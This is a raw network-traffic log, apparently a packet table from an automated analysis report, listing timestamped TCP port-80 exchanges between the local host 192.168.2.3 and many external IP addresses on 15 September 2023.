                                                                                                                                                                              Sep 15, 2023 07:26:54.805257082 CEST8049920206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.805495024 CEST8049920206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.805529118 CEST8049920206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.805563927 CEST4992080192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:54.805627108 CEST4992080192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:54.806502104 CEST4992080192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:54.830873966 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.830934048 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831032038 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831068039 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831099033 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831104040 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831099033 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831099033 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831140995 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831171989 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831171989 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831187010 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831198931 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831223011 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831239939 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831258059 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.831267118 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831267118 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.831291914 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:54.834875107 CEST4989780192.168.2.364.125.133.18
                                                                                                                                                                              Sep 15, 2023 07:26:54.841732979 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.844109058 CEST804992334.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.851130962 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:54.851696014 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:54.853564024 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:54.855755091 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.855793953 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.855876923 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.855892897 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.855904102 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.855931997 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.855940104 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.855967045 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.855978012 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856004953 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.856013060 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856044054 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.856050968 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856084108 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.856095076 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856121063 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.856129885 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856158018 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.856163025 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.856203079 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:54.858210087 CEST804992334.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.858279943 CEST4992380192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:54.858418941 CEST4992680192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:54.858469963 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:54.864329100 CEST804992254.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.875720024 CEST4973980192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:54.885324001 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:54.899615049 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:54.900023937 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:54.936645985 CEST804991880.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.936781883 CEST4991880192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:54.941620111 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.941674948 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:54.942188025 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.942264080 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:54.959942102 CEST8049722142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.960042953 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:54.963323116 CEST8049926142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.963411093 CEST4992680192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:54.966264009 CEST80499273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:54.966353893 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:54.977125883 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:54.977360964 CEST4992680192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:54.977385044 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:54.989859104 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:54.990426064 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.020720959 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.020844936 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.021060944 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.049510956 CEST8049920206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.067817926 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.073935032 CEST8049739170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077472925 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077538013 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:55.077544928 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077583075 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:55.077631950 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077668905 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077676058 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:55.077707052 CEST8049925104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.077719927 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:55.077753067 CEST4992580192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:55.082326889 CEST8049926142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.083647013 CEST8049928170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.083770037 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:55.086468935 CEST80499273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.086503029 CEST80499273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.086527109 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.086553097 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.087203026 CEST804972662.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.087698936 CEST804992962.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.087757111 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:55.098927021 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.098965883 CEST804991559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.099097967 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:55.099097967 CEST4991580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:55.101305962 CEST4992780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.120456934 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.120584965 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121171951 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121218920 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121269941 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121314049 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121351004 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121395111 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121488094 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121540070 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121563911 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121604919 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121607065 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121659994 CEST8049919118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.121669054 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.121721029 CEST4991980192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:55.124982119 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:55.125040054 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:55.155272007 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.155839920 CEST8049930213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.156032085 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.188009024 CEST8049926142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.188045025 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.188097000 CEST4992680192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:55.188407898 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.207684040 CEST80499273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.244746923 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:55.245567083 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:55.247128010 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.247967958 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.249913931 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.250602961 CEST4993480192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.265230894 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.265384912 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.265434027 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.265446901 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.265484095 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.265568018 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.265619040 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.265971899 CEST4992480192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:55.295726061 CEST80499313.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.295859098 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.297708988 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.312227011 CEST804992962.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.314896107 CEST804992962.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.314996004 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:55.323272943 CEST8049928170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.335900068 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.335967064 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:55.336282015 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.336452007 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:55.337692022 CEST4993280192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:55.337704897 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.337791920 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.338232994 CEST8049933104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.338315964 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.338510036 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.338721991 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:55.354907036 CEST8049930213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.354947090 CEST8049930213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.354984999 CEST8049930213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.354994059 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.355036974 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.355036974 CEST4993080192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:55.403779030 CEST80499313.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.403834105 CEST80499313.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.403888941 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.403888941 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.406188011 CEST4993180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:55.423325062 CEST80499343.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.423496962 CEST4993480192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.424608946 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.424680948 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.428597927 CEST8049932104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.429055929 CEST8049933104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.446851969 CEST4984180192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.446882963 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.446980000 CEST4993480192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.448489904 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.448549986 CEST4993680192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.459214926 CEST4973080192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:55.459578037 CEST4993780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:55.509170055 CEST8049924206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.512190104 CEST80499313.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.527956009 CEST804992962.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.528055906 CEST4992980192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:55.541667938 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:55.544831038 CEST8049841192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.544915915 CEST4984180192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.545391083 CEST8049935192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.545465946 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.549021959 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.577393055 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.577852964 CEST4993980192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.609478951 CEST8049928170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.609553099 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:55.620012999 CEST80499343.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.620291948 CEST80499343.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.620385885 CEST4993480192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:55.643527985 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:55.646655083 CEST8049935192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.646718979 CEST8049935192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.646779060 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.647887945 CEST804973789.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.648101091 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.649177074 CEST8049730185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.649281025 CEST8049933104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.649317980 CEST8049933104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.649370909 CEST8049933104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.649406910 CEST804993689.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.649466038 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.649466991 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.649466991 CEST4993380192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:55.649490118 CEST4993680192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.650027037 CEST8049937185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.650208950 CEST4993780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:55.706876993 CEST4993680192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.706933022 CEST4993780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:55.722837925 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.736553907 CEST8049938135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.736643076 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:55.736921072 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:55.747045040 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.747499943 CEST4994080192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.749066114 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.749514103 CEST4994180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.759485006 CEST804973380.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.759547949 CEST804993980.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.759639025 CEST4993980192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.759675026 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.759810925 CEST4993980192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.820245028 CEST8049935192.241.158.94192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.820323944 CEST4993580192.168.2.3192.241.158.94
                                                                                                                                                                              Sep 15, 2023 07:26:55.841749907 CEST8049928170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.843430996 CEST8049731192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.843585968 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.843873024 CEST8049940192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.843944073 CEST4994080192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.845179081 CEST8049734192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.845246077 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.845503092 CEST8049941192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.845572948 CEST4994180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.855464935 CEST4994080192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.855499029 CEST4994180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.897528887 CEST8049937185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.899061918 CEST8049937185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.899132013 CEST4993780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:55.907808065 CEST804993689.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.908406973 CEST804993689.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.908467054 CEST4993680192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.908477068 CEST804993689.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.908521891 CEST4993680192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:55.931941032 CEST8049938135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.932118893 CEST8049938135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.932414055 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:55.941586018 CEST804993980.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.941639900 CEST804993980.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.941695929 CEST4993980192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:55.951864958 CEST8049940192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.951899052 CEST8049941192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.952305079 CEST8049940192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.952358007 CEST4994080192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:55.953902960 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:55.954014063 CEST8049941192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.954071045 CEST4994180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:55.984221935 CEST8049928170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:55.984450102 CEST4992880192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:56.083159924 CEST4994080192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:56.083309889 CEST4993980192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:56.149005890 CEST8049938135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:56.149079084 CEST4993880192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:56.163634062 CEST4973580192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:56.163635015 CEST4974080192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:56.164591074 CEST4994280192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:56.164613008 CEST4994380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:56.165529013 CEST4984980192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:56.165936947 CEST4974980192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:56.166151047 CEST4994480192.168.2.3172.67.173.200
                                                                                                                                                                              Sep 15, 2023 07:26:56.166918993 CEST4994580192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:56.166999102 CEST4994680192.168.2.382.201.61.230
                                                                                                                                                                              Sep 15, 2023 07:26:56.180133104 CEST8049940192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:56.180187941 CEST4994080192.168.2.3192.124.249.10
